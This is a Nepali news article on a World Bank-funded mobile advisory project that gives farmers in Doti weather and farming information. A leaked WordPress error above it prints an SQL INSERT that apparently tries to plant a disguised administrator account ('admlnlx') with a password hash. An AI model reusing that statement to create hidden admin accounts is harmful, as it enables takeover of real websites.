WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCjfHaD1x3XZ4ApnqlHYhsvj3Cl9Tp/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 23:53:33', '', 'admlnlx', 'admlnlx')
डोटी, पुस १० –
कृषि प्रविधिका विषयमा जानकारी लिन तथा बाली तथा पशुमा देखिएका समस्याबारे घरबाटै जानकारी लिन सकिने भएको छ । विश्व बैंकको सहयोगमा कृषि विकास मन्त्रालयले यो परियोजना लागू गरेपछि डोटीमा पनि यस्तो प्रविधिको विकास भएको हो ।
सरकारी जलवायु प्रकोप समुत्थान परियोजनामार्फत कृषकले मौसम र जलवायुसम्बन्धी जानकारी पनि पाउने भएपछि उत्पादनमा समेत वृद्धि हुने भएको छ । आफूले आधुनिक कृषि व्यवस्थापन सूचना प्रविधिमार्फत किसानलाई सहज सूचना प्रदान गर्ने व्यवस्था मिलाइरहेको परियोजना निर्देशक विष्णुप्रसाद घिमिरेले राससलाई बताउनुभएको छ ।
उहाँले भन्नुभयो “यसमा किसानले घरमै बसेर मोबाइलमार्फत जल तथा मौसमको पूर्वानुमान गर्न, आधुनिक कृषि प्रविधिका विषयमा जानकारी लिन र बाली तथा पशुमा देखिएका समस्या समाधानका विषयमा जानकारी पाउनेछन् ।
विश्व बैंकको तीन करोड १३ लाख अमेरिकी डलरमा सञ्चालित परियोजना देशका २५ जिल्लामा लागू भएको छ ।